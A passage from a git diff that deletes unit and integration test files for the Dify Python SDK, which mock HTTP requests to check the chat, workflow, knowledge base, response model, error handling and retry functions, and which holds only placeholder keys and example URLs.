) - - @patch("httpx.Client.request") - def test_file_upload_integration(self, mock_request): - """Test file_upload integration.""" - mock_response = Mock() - mock_response.status_code = 200 - mock_response.json.return_value = { - "id": "file_123", - "name": "test.txt", - "size": 1024, - "mime_type": "text/plain", - } - mock_request.return_value = mock_response - - files = {"file": ("test.txt", "test content", "text/plain")} - response = self.client.file_upload("user_123", files) - data = response.json() - - self.assertEqual(response.status_code, 200) - self.assertEqual(data["id"], "file_123") - self.assertEqual(data["name"], "test.txt") - - @patch("httpx.Client.request") - def test_message_feedback_integration(self, mock_request): - """Test message_feedback integration.""" - mock_response = Mock() - mock_response.status_code = 200 - mock_response.json.return_value = {"success": True} - mock_request.return_value = mock_response - - response = self.client.message_feedback("msg_123", "like", "user_123") - data = response.json() - - self.assertEqual(response.status_code, 200) - self.assertTrue(data["success"]) - mock_request.assert_called_once_with( - "POST", - "/messages/msg_123/feedbacks", - json={"rating": "like", "user": "user_123"}, - params=None, - headers={ - "Authorization": "Bearer test_api_key", - "Content-Type": "application/json", - }, - ) - - -class TestChatClientIntegration(unittest.TestCase): - """Integration tests for ChatClient.""" - - def setUp(self): - self.client = ChatClient("test_api_key", enable_logging=False) - - @patch("httpx.Client.request") - def test_create_chat_message_blocking(self, mock_request): - """Test create_chat_message with blocking response.""" - mock_response = Mock() - mock_response.status_code = 200 - mock_response.json.return_value = { - "id": "msg_123", - "answer": "Hello! How can I help you today?", - "conversation_id": "conv_123", - "created_at": 1234567890, - } - mock_request.return_value = mock_response - - response = self.client.create_chat_message( - inputs={"query": "Hello"}, - query="Hello, AI!", - user="user_123", - response_mode="blocking", - ) - data = response.json() - - self.assertEqual(response.status_code, 200) - self.assertEqual(data["answer"], "Hello! How can I help you today?") - self.assertEqual(data["conversation_id"], "conv_123") - - @patch("httpx.Client.request") - def test_create_chat_message_streaming(self, mock_request): - """Test create_chat_message with streaming response.""" - mock_response = Mock() - mock_response.status_code = 200 - mock_response.iter_lines.return_value = [ - b'data: {"answer": "Hello"}', - b'data: {"answer": " world"}', - b'data: {"answer": "!"}', - ] - mock_request.return_value = mock_response - - response = self.client.create_chat_message(inputs={}, query="Hello", user="user_123", response_mode="streaming") - - self.assertEqual(response.status_code, 200) - lines = list(response.iter_lines()) - self.assertEqual(len(lines), 3) - - @patch("httpx.Client.request") - def test_get_conversations_integration(self, mock_request): - """Test get_conversations integration.""" - mock_response = Mock() - mock_response.status_code = 200 - mock_response.json.return_value = { - "data": [ - {"id": "conv_1", "name": "Conversation 1"}, - {"id": "conv_2", "name": "Conversation 2"}, - ], - "has_more": False, - "limit": 20, - } - mock_request.return_value = mock_response - - response = self.client.get_conversations("user_123", limit=20) - data = response.json() - - self.assertEqual(response.status_code, 200) - self.assertEqual(len(data["data"]), 2) - self.assertEqual(data["data"][0]["name"], "Conversation 1") - - @patch("httpx.Client.request") - def test_get_conversation_messages_integration(self, mock_request): - """Test get_conversation_messages integration.""" - mock_response = Mock() - mock_response.status_code = 200 - mock_response.json.return_value = { - "data": [ - {"id": "msg_1", "role": "user", "content": "Hello"}, - {"id": "msg_2", "role": "assistant", "content": "Hi there!"}, - ] - } - mock_request.return_value = mock_response - - response = self.client.get_conversation_messages("user_123", conversation_id="conv_123") - data = response.json() - - self.assertEqual(response.status_code, 200) - self.assertEqual(len(data["data"]), 2) - self.assertEqual(data["data"][0]["role"], "user") - - -class TestCompletionClientIntegration(unittest.TestCase): - """Integration tests for CompletionClient.""" - - def setUp(self): - self.client = CompletionClient("test_api_key", enable_logging=False) - - @patch("httpx.Client.request") - def test_create_completion_message_blocking(self, mock_request): - """Test create_completion_message with blocking response.""" - mock_response = Mock() - mock_response.status_code = 200 - mock_response.json.return_value = { - "id": "comp_123", - "answer": "This is a completion response.", - "created_at": 1234567890, - } - mock_request.return_value = mock_response - - response = self.client.create_completion_message( - inputs={"prompt": "Complete this sentence"}, - response_mode="blocking", - user="user_123", - ) - data = response.json() - - self.assertEqual(response.status_code, 200) - self.assertEqual(data["answer"], "This is a completion response.") - - @patch("httpx.Client.request") - def test_create_completion_message_with_files(self, mock_request): - """Test create_completion_message with files.""" - mock_response = Mock() - mock_response.status_code = 200 - mock_response.json.return_value = { - "id": "comp_124", - "answer": "I can see the image shows...", - "files": [{"id": "file_1", "type": "image"}], - } - mock_request.return_value = mock_response - - files = { - "file": { - "type": "image", - "transfer_method": "remote_url", - "url": "https://example.com/image.jpg", - } - } - response = self.client.create_completion_message( - inputs={"prompt": "Describe this image"}, - response_mode="blocking", - user="user_123", - files=files, - ) - data = response.json() - - self.assertEqual(response.status_code, 200) - self.assertIn("image", data["answer"]) - self.assertEqual(len(data["files"]), 1) - - -class TestWorkflowClientIntegration(unittest.TestCase): - """Integration tests for WorkflowClient.""" - - def setUp(self): - self.client = WorkflowClient("test_api_key", enable_logging=False) - - @patch("httpx.Client.request") - def test_run_workflow_blocking(self, mock_request): - """Test run workflow with blocking response.""" - mock_response = Mock() - mock_response.status_code = 200 - mock_response.json.return_value = { - "id": "run_123", - "workflow_id": "workflow_123", - "status": "succeeded", - "inputs": {"query": "Test input"}, - "outputs": {"result": "Test output"}, - "elapsed_time": 2.5, - } - mock_request.return_value = mock_response - - response = self.client.run(inputs={"query": "Test input"}, response_mode="blocking", user="user_123") - data = response.json() - - self.assertEqual(response.status_code, 200) - self.assertEqual(data["status"], "succeeded") - self.assertEqual(data["outputs"]["result"], "Test output") - - @patch("httpx.Client.request") - def test_get_workflow_logs(self, mock_request): - """Test get_workflow_logs integration.""" - mock_response = Mock() - mock_response.status_code = 200 - mock_response.json.return_value = { - "logs": [ - {"id": "log_1", "status": "succeeded", "created_at": 1234567890}, - {"id": "log_2", "status": "failed", "created_at": 1234567891}, - ], - "total": 2, - "page": 1, - "limit": 20, - } - mock_request.return_value = mock_response - - response = self.client.get_workflow_logs(page=1, limit=20) - data = response.json() - - self.assertEqual(response.status_code, 200) - self.assertEqual(len(data["logs"]), 2) - self.assertEqual(data["logs"][0]["status"], "succeeded") - - -class TestKnowledgeBaseClientIntegration(unittest.TestCase): - """Integration tests for KnowledgeBaseClient.""" - - def setUp(self): - self.client = KnowledgeBaseClient("test_api_key") - - @patch("httpx.Client.request") - def test_create_dataset(self, mock_request): - """Test create_dataset integration.""" - mock_response = Mock() - mock_response.status_code = 200 - mock_response.json.return_value = { - "id": "dataset_123", - "name": "Test Dataset", - "description": "A test dataset", - "created_at": 1234567890, - } - mock_request.return_value = mock_response - - response = self.client.create_dataset(name="Test Dataset") - data = response.json() - - self.assertEqual(response.status_code, 200) - self.assertEqual(data["name"], "Test Dataset") - self.assertEqual(data["id"], "dataset_123") - - @patch("httpx.Client.request") - def test_list_datasets(self, mock_request): - """Test list_datasets integration.""" - mock_response = Mock() - mock_response.status_code = 200 - mock_response.json.return_value = { - "data": [ - {"id": "dataset_1", "name": "Dataset 1"}, - {"id": "dataset_2", "name": "Dataset 2"}, - ], - "has_more": False, - "limit": 20, - } - mock_request.return_value = mock_response - - response = self.client.list_datasets(page=1, page_size=20) - data = response.json() - - self.assertEqual(response.status_code, 200) - self.assertEqual(len(data["data"]), 2) - - @patch("httpx.Client.request") - def test_create_document_by_text(self, mock_request): - """Test create_document_by_text integration.""" - mock_response = Mock() - mock_response.status_code = 200 - mock_response.json.return_value = { - "document": { - "id": "doc_123", - "name": "Test Document", - "word_count": 100, - "status": "indexing", - } - } - mock_request.return_value = mock_response - - # Mock dataset_id - self.client.dataset_id = "dataset_123" - - response = self.client.create_document_by_text(name="Test Document", text="This is test document content.") - data = response.json() - - self.assertEqual(response.status_code, 200) - self.assertEqual(data["document"]["name"], "Test Document") - self.assertEqual(data["document"]["word_count"], 100) - - -class TestWorkspaceClientIntegration(unittest.TestCase): - """Integration tests for WorkspaceClient.""" - - def setUp(self): - self.client = WorkspaceClient("test_api_key", enable_logging=False) - - @patch("httpx.Client.request") - def test_get_available_models(self, mock_request): - """Test get_available_models integration.""" - mock_response = Mock() - mock_response.status_code = 200 - mock_response.json.return_value = { - "models": [ - {"id": "gpt-4", "name": "GPT-4", "provider": "openai"}, - {"id": "claude-3", "name": "Claude 3", "provider": "anthropic"}, - ] - } - mock_request.return_value = mock_response - - response = self.client.get_available_models("llm") - data = response.json() - - self.assertEqual(response.status_code, 200) - self.assertEqual(len(data["models"]), 2) - self.assertEqual(data["models"][0]["id"], "gpt-4") - - -class TestErrorScenariosIntegration(unittest.TestCase): - """Integration tests for error scenarios.""" - - def setUp(self): - self.client = DifyClient("test_api_key", enable_logging=False) - - @patch("httpx.Client.request") - def test_authentication_error_integration(self, mock_request): - """Test authentication error in integration.""" - mock_response = Mock() - mock_response.status_code = 401 - mock_response.json.return_value = {"message": "Invalid API key"} - mock_request.return_value = mock_response - - with self.assertRaises(AuthenticationError) as context: - self.client.get_app_info() - - self.assertEqual(str(context.exception), "Invalid API key") - self.assertEqual(context.exception.status_code, 401) - - @patch("httpx.Client.request") - def test_rate_limit_error_integration(self, mock_request): - """Test rate limit error in integration.""" - mock_response = Mock() - mock_response.status_code = 429 - mock_response.json.return_value = {"message": "Rate limit exceeded"} - mock_response.headers = {"Retry-After": "60"} - mock_request.return_value = mock_response - - with self.assertRaises(RateLimitError) as context: - self.client.get_app_info() - - self.assertEqual(str(context.exception), "Rate limit exceeded") - self.assertEqual(context.exception.retry_after, "60") - - @patch("httpx.Client.request") - def test_server_error_with_retry_integration(self, mock_request): - """Test server error with retry in integration.""" - # API errors don't retry by design - only network/timeout errors retry - mock_response_500 = Mock() - mock_response_500.status_code = 500 - mock_response_500.json.return_value = {"message": "Internal server error"} - - mock_request.return_value = mock_response_500 - - with patch("time.sleep"): # Skip actual sleep - with self.assertRaises(APIError) as context: - self.client.get_app_info() - - self.assertEqual(str(context.exception), "Internal server error") - self.assertEqual(mock_request.call_count, 1) - - @patch("httpx.Client.request") - def test_validation_error_integration(self, mock_request): - """Test validation error in integration.""" - mock_response = Mock() - mock_response.status_code = 422 - mock_response.json.return_value = { - "message": "Validation failed", - "details": {"field": "query", "error": "required"}, - } - mock_request.return_value = mock_response - - with self.assertRaises(ValidationError) as context: - self.client.get_app_info() - - self.assertEqual(str(context.exception), "Validation failed") - self.assertEqual(context.exception.status_code, 422) - - -class TestContextManagerIntegration(unittest.TestCase): - """Integration tests for context manager usage.""" - - @patch("httpx.Client.close") - @patch("httpx.Client.request") - def test_context_manager_usage(self, mock_request, mock_close): - """Test context manager properly closes connections.""" - mock_response = Mock() - mock_response.status_code = 200 - mock_response.json.return_value = {"id": "app_123", "name": "Test App"} - mock_request.return_value = mock_response - - with DifyClient("test_api_key") as client: - response = client.get_app_info() - self.assertEqual(response.status_code, 200) - - # Verify close was called - mock_close.assert_called_once() - - @patch("httpx.Client.close") - def test_manual_close(self, mock_close): - """Test manual close method.""" - client = DifyClient("test_api_key") - client.close() - mock_close.assert_called_once() - - -if __name__ == "__main__": - unittest.main() diff --git a/sdks/python-client/tests/test_models.py b/sdks/python-client/tests/test_models.py deleted file mode 100644 index db9d92ad5b..0000000000 --- a/sdks/python-client/tests/test_models.py +++ /dev/null @@ -1,640 +0,0 @@ -"""Unit tests for response models.""" - -import unittest -import json -from datetime import datetime -from dify_client.models import ( - BaseResponse, - ErrorResponse, - FileInfo, - MessageResponse, - ConversationResponse, - DatasetResponse, - DocumentResponse, - DocumentSegmentResponse, - WorkflowRunResponse, - ApplicationParametersResponse, - AnnotationResponse, - PaginatedResponse, - ConversationVariableResponse, - FileUploadResponse, - AudioResponse, - SuggestedQuestionsResponse, - AppInfoResponse, - WorkspaceModelsResponse, - HitTestingResponse, - DatasetTagsResponse, - WorkflowLogsResponse, - ModelProviderResponse, - FileInfoResponse, - WorkflowDraftResponse, - ApiTokenResponse, - JobStatusResponse, - DatasetQueryResponse, - DatasetTemplateResponse, -) - - -class TestResponseModels(unittest.TestCase): - """Test cases for response model classes.""" - - def test_base_response(self): - """Test BaseResponse model.""" - response = BaseResponse(success=True, message="Operation successful") - self.assertTrue(response.success) - self.assertEqual(response.message, "Operation successful") - - def test_base_response_defaults(self): - """Test BaseResponse with default values.""" - response = BaseResponse(success=True) - self.assertTrue(response.success) - self.assertIsNone(response.message) - - def test_error_response(self): - """Test ErrorResponse model.""" - response = ErrorResponse( - success=False, - message="Error occurred", - error_code="VALIDATION_ERROR", - details={"field": "invalid_value"}, - ) - self.assertFalse(response.success) - self.assertEqual(response.message, "Error occurred") - self.assertEqual(response.error_code, "VALIDATION_ERROR") - self.assertEqual(response.details["field"], "invalid_value") - - def test_file_info(self): - """Test FileInfo model.""" - now = datetime.now() - file_info = FileInfo( - id="file_123", - name="test.txt", - size=1024, - mime_type="text/plain", - url="https://example.com/file.txt", - created_at=now, - ) - self.assertEqual(file_info.id, "file_123") - self.assertEqual(file_info.name, "test.txt") - self.assertEqual(file_info.size, 1024) - self.assertEqual(file_info.mime_type, "text/plain") - self.assertEqual(file_info.url, "https://example.com/file.txt") - self.assertEqual(file_info.created_at, now) - - def test_message_response(self): - """Test MessageResponse model.""" - response = MessageResponse( - success=True, - id="msg_123", - answer="Hello, world!", - conversation_id="conv_123", - created_at=1234567890, - metadata={"model": "gpt-4"}, - files=[{"id": "file_1", "type": "image"}], - ) - self.assertTrue(response.success) - self.assertEqual(response.id, "msg_123") - self.assertEqual(response.answer, "Hello, world!") - self.assertEqual(response.conversation_id, "conv_123") - self.assertEqual(response.created_at, 1234567890) - self.assertEqual(response.metadata["model"], "gpt-4") - self.assertEqual(response.files[0]["id"], "file_1") - - def test_conversation_response(self): - """Test ConversationResponse model.""" - response = ConversationResponse( - success=True, - id="conv_123", - name="Test Conversation", - inputs={"query": "Hello"}, - status="active", - created_at=1234567890, - updated_at=1234567891, - ) - self.assertTrue(response.success) - self.assertEqual(response.id, "conv_123") - self.assertEqual(response.name, "Test Conversation") - self.assertEqual(response.inputs["query"], "Hello") - self.assertEqual(response.status, "active") - self.assertEqual(response.created_at, 1234567890) - self.assertEqual(response.updated_at, 1234567891) - - def test_dataset_response(self): - """Test DatasetResponse model.""" - response = DatasetResponse( - success=True, - id="dataset_123", - name="Test Dataset", - description="A test dataset", - permission="read", - indexing_technique="high_quality", - embedding_model="text-embedding-ada-002", - embedding_model_provider="openai", - retrieval_model={"search_type": "semantic"}, - document_count=10, - word_count=5000, - app_count=2, - created_at=1234567890, - updated_at=1234567891, - ) - self.assertTrue(response.success) - self.assertEqual(response.id, "dataset_123") - self.assertEqual(response.name, "Test Dataset") - self.assertEqual(response.description, "A test dataset") - self.assertEqual(response.permission, "read") - self.assertEqual(response.indexing_technique, "high_quality") - self.assertEqual(response.embedding_model, "text-embedding-ada-002") - self.assertEqual(response.embedding_model_provider, "openai") - self.assertEqual(response.retrieval_model["search_type"], "semantic") - self.assertEqual(response.document_count, 10) - self.assertEqual(response.word_count, 5000) - self.assertEqual(response.app_count, 2) - - def test_document_response(self): - """Test DocumentResponse model.""" - response = DocumentResponse( - success=True, - id="doc_123", - name="test_document.txt", - data_source_type="upload_file", - position=1, - enabled=True, - word_count=1000, - hit_count=5, - doc_form="text_model", - created_at=1234567890.0, - indexing_status="completed", - completed_at=1234567891.0, - ) - self.assertTrue(response.success) - self.assertEqual(response.id, "doc_123") - self.assertEqual(response.name, "test_document.txt") - self.assertEqual(response.data_source_type, "upload_file") - self.assertEqual(response.position, 1) - self.assertTrue(response.enabled) - self.assertEqual(response.word_count, 1000) - self.assertEqual(response.hit_count, 5) - self.assertEqual(response.doc_form, "text_model") - self.assertEqual(response.created_at, 1234567890.0) - self.assertEqual(response.indexing_status, "completed") - self.assertEqual(response.completed_at, 1234567891.0) - - def test_document_segment_response(self): - """Test DocumentSegmentResponse model.""" - response = DocumentSegmentResponse( - success=True, - id="seg_123", - position=1, - document_id="doc_123", - content="This is a test segment.", - answer="Test answer", - word_count=5, - tokens=10, - keywords=["test", "segment"], - hit_count=2, - enabled=True, - status="completed", - created_at=1234567890.0, - completed_at=1234567891.0, - ) - self.assertTrue(response.success) - self.assertEqual(response.id, "seg_123") - self.assertEqual(response.position, 1) - self.assertEqual(response.document_id, "doc_123") - self.assertEqual(response.content, "This is a test segment.") - self.assertEqual(response.answer, "Test answer") - self.assertEqual(response.word_count, 5) - self.assertEqual(response.tokens, 10) - self.assertEqual(response.keywords, ["test", "segment"]) - self.assertEqual(response.hit_count, 2) - self.assertTrue(response.enabled) - self.assertEqual(response.status, "completed") - self.assertEqual(response.created_at, 1234567890.0) - self.assertEqual(response.completed_at, 1234567891.0) - - def test_workflow_run_response(self): - """Test WorkflowRunResponse model.""" - response = WorkflowRunResponse( - success=True, - id="run_123", - workflow_id="workflow_123", - status="succeeded", - inputs={"query": "test"}, - outputs={"answer": "result"}, - elapsed_time=5.5, - total_tokens=100, - total_steps=3, - created_at=1234567890.0, - finished_at=1234567895.5, - ) - self.assertTrue(response.success) - self.assertEqual(response.id, "run_123") - self.assertEqual(response.workflow_id, "workflow_123") - self.assertEqual(response.status, "succeeded") - self.assertEqual(response.inputs["query"], "test") - self.assertEqual(response.outputs["answer"], "result") - self.assertEqual(response.elapsed_time, 5.5) - self.assertEqual(response.total_tokens, 100) - self.assertEqual(response.total_steps, 3) - self.assertEqual(response.created_at, 1234567890.0) - self.assertEqual(response.finished_at, 1234567895.5) - - def test_application_parameters_response(self): - """Test ApplicationParametersResponse model.""" - response = ApplicationParametersResponse( - success=True, - opening_statement="Hello! How can I help you?", - suggested_questions=["What is AI?", "How does this work?"], - speech_to_text={"enabled": True}, - text_to_speech={"enabled": False, "voice": "alloy"}, - retriever_resource={"enabled": True}, - sensitive_word_avoidance={"enabled": False}, - file_upload={"enabled": True, "file_size_limit": 10485760}, - system_parameters={"max_tokens": 1000}, - user_input_form=[{"type": "text", "label": "Query"}], - ) - self.assertTrue(response.success) - self.assertEqual(response.opening_statement, "Hello! How can I help you?") - self.assertEqual(response.suggested_questions, ["What is AI?", "How does this work?"]) - self.assertTrue(response.speech_to_text["enabled"]) - self.assertFalse(response.text_to_speech["enabled"]) - self.assertEqual(response.text_to_speech["voice"], "alloy") - self.assertTrue(response.retriever_resource["enabled"]) - self.assertFalse(response.sensitive_word_avoidance["enabled"]) - self.assertTrue(response.file_upload["enabled"]) - self.assertEqual(response.file_upload["file_size_limit"], 10485760) - self.assertEqual(response.system_parameters["max_tokens"], 1000) - self.assertEqual(response.user_input_form[0]["type"], "text") - - def test_annotation_response(self): - """Test AnnotationResponse model.""" - response = AnnotationResponse( - success=True, - id="annotation_123", - question="What is the capital of France?", - answer="Paris", - content="Additional context", - created_at=1234567890.0, - updated_at=1234567891.0, - created_by="user_123", - updated_by="user_123", - hit_count=5, - ) - self.assertTrue(response.success) - self.assertEqual(response.id, "annotation_123") - self.assertEqual(response.question, "What is the capital of France?") - self.assertEqual(response.answer, "Paris") - self.assertEqual(response.content, "Additional context") - self.assertEqual(response.created_at, 1234567890.0) - self.assertEqual(response.updated_at, 1234567891.0) - self.assertEqual(response.created_by, "user_123") - self.assertEqual(response.updated_by, "user_123") - self.assertEqual(response.hit_count, 5) - - def test_paginated_response(self): - """Test PaginatedResponse model.""" - response = PaginatedResponse( - success=True, - data=[{"id": 1}, {"id": 2}, {"id": 3}], - has_more=True, - limit=10, - total=100, - page=1, - ) - self.assertTrue(response.success) - self.assertEqual(len(response.data), 3) - self.assertEqual(response.data[0]["id"], 1) - self.assertTrue(response.has_more) - self.assertEqual(response.limit, 10) - self.assertEqual(response.total, 100) - self.assertEqual(response.page, 1) - - def test_conversation_variable_response(self): - """Test ConversationVariableResponse model.""" - response = ConversationVariableResponse( - success=True, - conversation_id="conv_123", - variables=[ - {"id": "var_1", "name": "user_name", "value": "John"}, - {"id": "var_2", "name": "preferences", "value": {"theme": "dark"}}, - ], - ) - self.assertTrue(response.success) - self.assertEqual(response.conversation_id, "conv_123") - self.assertEqual(len(response.variables), 2) - self.assertEqual(response.variables[0]["name"], "user_name") - self.assertEqual(response.variables[0]["value"], "John") - self.assertEqual(response.variables[1]["name"], "preferences") - self.assertEqual(response.variables[1]["value"]["theme"], "dark") - - def test_file_upload_response(self): - """Test FileUploadResponse model.""" - response = FileUploadResponse( - success=True, - id="file_123", - name="test.txt", - size=1024, - mime_type="text/plain", - url="https://example.com/files/test.txt", - created_at=1234567890.0, - ) - self.assertTrue(response.success) - self.assertEqual(response.id, "file_123") - self.assertEqual(response.name, "test.txt") - self.assertEqual(response.size, 1024) - self.assertEqual(response.mime_type, "text/plain") - self.assertEqual(response.url, "https://example.com/files/test.txt") - self.assertEqual(response.created_at, 1234567890.0) - - def test_audio_response(self): - """Test AudioResponse model.""" - response = AudioResponse( - success=True, - audio="base64_encoded_audio_data", - audio_url="https://example.com/audio.mp3", - duration=10.5, - sample_rate=44100, - ) - self.assertTrue(response.success) - self.assertEqual(response.audio, "base64_encoded_audio_data") - self.assertEqual(response.audio_url, "https://example.com/audio.mp3") - self.assertEqual(response.duration, 10.5) - self.assertEqual(response.sample_rate, 44100) - - def test_suggested_questions_response(self): - """Test SuggestedQuestionsResponse model.""" - response = SuggestedQuestionsResponse( - success=True, - message_id="msg_123", - questions=[ - "What is machine learning?", - "How does AI work?", - "Can you explain neural networks?", - ], - ) - self.assertTrue(response.success) - self.assertEqual(response.message_id, "msg_123") - self.assertEqual(len(response.questions), 3) - self.assertEqual(response.questions[0], "What is machine learning?") - - def test_app_info_response(self): - """Test AppInfoResponse model.""" - response = AppInfoResponse( - success=True, - id="app_123", - name="Test App", - description="A test application", - icon="🤖", - icon_background="#FF6B6B", - mode="chat", - tags=["AI", "Chat", "Test"], - enable_site=True, - enable_api=True, - api_token="app_token_123", - ) - self.assertTrue(response.success) - self.assertEqual(response.id, "app_123") - self.assertEqual(response.name, "Test App") - self.assertEqual(response.description, "A test application") - self.assertEqual(response.icon, "🤖") - self.assertEqual(response.icon_background, "#FF6B6B") - self.assertEqual(response.mode, "chat") - self.assertEqual(response.tags, ["AI", "Chat", "Test"]) - self.assertTrue(response.enable_site) - self.assertTrue(response.enable_api) - self.assertEqual(response.api_token, "app_token_123") - - def test_workspace_models_response(self): - """Test WorkspaceModelsResponse model.""" - response = WorkspaceModelsResponse( - success=True, - models=[ - {"id": "gpt-4", "name": "GPT-4", "provider": "openai"}, - {"id": "claude-3", "name": "Claude 3", "provider": "anthropic"}, - ], - ) - self.assertTrue(response.success) - self.assertEqual(len(response.models), 2) - self.assertEqual(response.models[0]["id"], "gpt-4") - self.assertEqual(response.models[0]["name"], "GPT-4") - self.assertEqual(response.models[0]["provider"], "openai") - - def test_hit_testing_response(self): - """Test HitTestingResponse model.""" - response = HitTestingResponse( - success=True, - query="What is machine learning?", - records=[ - {"content": "Machine learning is a subset of AI...", "score": 0.95}, - {"content": "ML algorithms learn from data...", "score": 0.87}, - ], - ) - self.assertTrue(response.success) - self.assertEqual(response.query, "What is machine learning?") - self.assertEqual(len(response.records), 2) - self.assertEqual(response.records[0]["score"], 0.95) - - def test_dataset_tags_response(self): - """Test DatasetTagsResponse model.""" - response = DatasetTagsResponse( - success=True, - tags=[ - {"id": "tag_1", "name": "Technology", "color": "#FF0000"}, - {"id": "tag_2", "name": "Science", "color": "#00FF00"}, - ], - ) - self.assertTrue(response.success) - self.assertEqual(len(response.tags), 2) - self.assertEqual(response.tags[0]["name"], "Technology") - self.assertEqual(response.tags[0]["color"], "#FF0000") - - def test_workflow_logs_response(self): - """Test WorkflowLogsResponse model.""" - response = WorkflowLogsResponse( - success=True, - logs=[ - {"id": "log_1", "status": "succeeded", "created_at": 1234567890}, - {"id": "log_2", "status": "failed", "created_at": 1234567891}, - ], - total=50, - page=1, - limit=10, - has_more=True, - ) - self.assertTrue(response.success) - self.assertEqual(len(response.logs), 2) - self.assertEqual(response.logs[0]["status"], "succeeded") - self.assertEqual(response.total, 50) - self.assertEqual(response.page, 1) - self.assertEqual(response.limit, 10) - self.assertTrue(response.has_more) - - def test_model_serialization(self): - """Test that models can be serialized to JSON.""" - response = MessageResponse( - success=True, - id="msg_123", - answer="Hello, world!", - conversation_id="conv_123", - ) - - # Convert to dict and then to JSON - response_dict = { - "success": response.success, - "id": response.id, - "answer": response.answer, - "conversation_id": response.conversation_id, - } - - json_str = json.dumps(response_dict) - parsed = json.loads(json_str) - - self.assertTrue(parsed["success"]) - self.assertEqual(parsed["id"], "msg_123") - self.assertEqual(parsed["answer"], "Hello, world!") - self.assertEqual(parsed["conversation_id"], "conv_123") - - # Tests for new response models - def test_model_provider_response(self): - """Test ModelProviderResponse model.""" - response = ModelProviderResponse( - success=True, - provider_name="openai", - provider_type="llm", - models=[ - {"id": "gpt-4", "name": "GPT-4", "max_tokens": 8192}, - {"id": "gpt-3.5-turbo", "name": "GPT-3.5 Turbo", "max_tokens": 4096}, - ], - is_enabled=True, - credentials={"api_key": "sk-..."}, - ) - self.assertTrue(response.success) - self.assertEqual(response.provider_name, "openai") - self.assertEqual(response.provider_type, "llm") - self.assertEqual(len(response.models), 2) - self.assertEqual(response.models[0]["id"], "gpt-4") - self.assertTrue(response.is_enabled) - self.assertEqual(response.credentials["api_key"], "sk-...") - - def test_file_info_response(self): - """Test FileInfoResponse model.""" - response = FileInfoResponse( - success=True, - id="file_123", - name="document.pdf", - size=2048576, - mime_type="application/pdf", - url="https://example.com/files/document.pdf", - created_at=1234567890, - metadata={"pages": 10, "author": "John Doe"}, - ) - self.assertTrue(response.success) - self.assertEqual(response.id, "file_123") - self.assertEqual(response.name, "document.pdf") - self.assertEqual(response.size, 2048576) - self.assertEqual(response.mime_type, "application/pdf") - self.assertEqual(response.url, "https://example.com/files/document.pdf") - self.assertEqual(response.created_at, 1234567890) - self.assertEqual(response.metadata["pages"], 10) - - def test_workflow_draft_response(self): - """Test WorkflowDraftResponse model.""" - response = WorkflowDraftResponse( - success=True, - id="draft_123", - app_id="app_456", - draft_data={"nodes": [], "edges": [], "config": {"name": "Test Workflow"}}, - version=1, - created_at=1234567890, - updated_at=1234567891, - ) - self.assertTrue(response.success) - self.assertEqual(response.id, "draft_123") - self.assertEqual(response.app_id, "app_456") - self.assertEqual(response.draft_data["config"]["name"], "Test Workflow") - self.assertEqual(response.version, 1) - self.assertEqual(response.created_at, 1234567890) - self.assertEqual(response.updated_at, 1234567891) - - def test_api_token_response(self): - """Test ApiTokenResponse model.""" - response = ApiTokenResponse( - success=True, - id="token_123", - name="Production Token", - token="app-xxxxxxxxxxxx", - description="Token for production environment", - created_at=1234567890, - last_used_at=1234567891, - is_active=True, - ) - self.assertTrue(response.success) - self.assertEqual(response.id, "token_123") - self.assertEqual(response.name, "Production Token") - self.assertEqual(response.token, "app-xxxxxxxxxxxx") - self.assertEqual(response.description, "Token for production environment") - self.assertEqual(response.created_at, 1234567890) - self.assertEqual(response.last_used_at, 1234567891) - self.assertTrue(response.is_active) - - def test_job_status_response(self): - """Test JobStatusResponse model.""" - response = JobStatusResponse( - success=True, - job_id="job_123", - job_status="running", - error_msg=None, - progress=0.75, - created_at=1234567890, - updated_at=1234567891, - ) - self.assertTrue(response.success) - self.assertEqual(response.job_id, "job_123") - self.assertEqual(response.job_status, "running") - self.assertIsNone(response.error_msg) - self.assertEqual(response.progress, 0.75) - self.assertEqual(response.created_at, 1234567890) - self.assertEqual(response.updated_at, 1234567891) - - def test_dataset_query_response(self): - """Test DatasetQueryResponse model.""" - response = DatasetQueryResponse( - success=True, - query="What is machine learning?", - records=[ - {"content": "Machine learning is...", "score": 0.95}, - {"content": "ML algorithms...", "score": 0.87}, - ], - total=2, - search_time=0.123, - retrieval_model={"method": "semantic_search", "top_k": 3}, - ) - self.assertTrue(response.success) - self.assertEqual(response.query, "What is machine learning?") - self.assertEqual(len(response.records), 2) - self.assertEqual(response.total, 2) - self.assertEqual(response.search_time, 0.123) - self.assertEqual(response.retrieval_model["method"], "semantic_search") - - def test_dataset_template_response(self): - """Test DatasetTemplateResponse model.""" - response = DatasetTemplateResponse( - success=True, - template_name="customer_support", - display_name="Customer Support", - description="Template for customer support knowledge base", - category="support", - icon="🎧", - config_schema={"fields": [{"name": "category", "type": "string"}]}, - ) - self.assertTrue(response.success) - self.assertEqual(response.template_name, "customer_support") - self.assertEqual(response.display_name, "Customer Support") - self.assertEqual(response.description, "Template for customer support knowledge base") - self.assertEqual(response.category, "support") - self.assertEqual(response.icon, "🎧") - self.assertEqual(response.config_schema["fields"][0]["name"], "category") - - -if __name__ == "__main__": - unittest.main() diff --git a/sdks/python-client/tests/test_retry_and_error_handling.py b/sdks/python-client/tests/test_retry_and_error_handling.py deleted file mode 100644 index bd415bde43..0000000000 --- a/sdks/python-client/tests/test_retry_and_error_handling.py +++ /dev/null @@ -1,313 +0,0 @@ -"""Unit tests for retry mechanism and error handling.""" - -import unittest -from unittest.mock import Mock, patch, MagicMock -import httpx -from dify_client.client import DifyClient -from dify_client.exceptions import ( - APIError, - AuthenticationError, - RateLimitError, - ValidationError, - NetworkError, - TimeoutError, - FileUploadError, -) - - -class TestRetryMechanism(unittest.TestCase): - """Test cases for retry mechanism.""" - - def setUp(self): - self.api_key = "test_api_key" - self.base_url = "https://api.dify.ai/v1" - self.client = DifyClient( - api_key=self.api_key, - base_url=self.base_url, - max_retries=3, - retry_delay=0.1, # Short delay for tests - enable_logging=False, - ) - - @patch("httpx.Client.request") - def test_successful_request_no_retry(self, mock_request): - """Test that successful requests don't trigger retries.""" - mock_response = Mock() - mock_response.status_code = 200 - mock_response.content = b'{"success": true}' - mock_request.return_value = mock_response - - response = self.client._send_request("GET", "/test") - - self.assertEqual(response, mock_response) - self.assertEqual(mock_request.call_count, 1) - - @patch("httpx.Client.request") - @patch("time.sleep") - def test_retry_on_network_error(self, mock_sleep, mock_request): - """Test retry on network errors.""" - # First two calls raise network error, third succeeds - mock_request.side_effect = [ - httpx.NetworkError("Connection 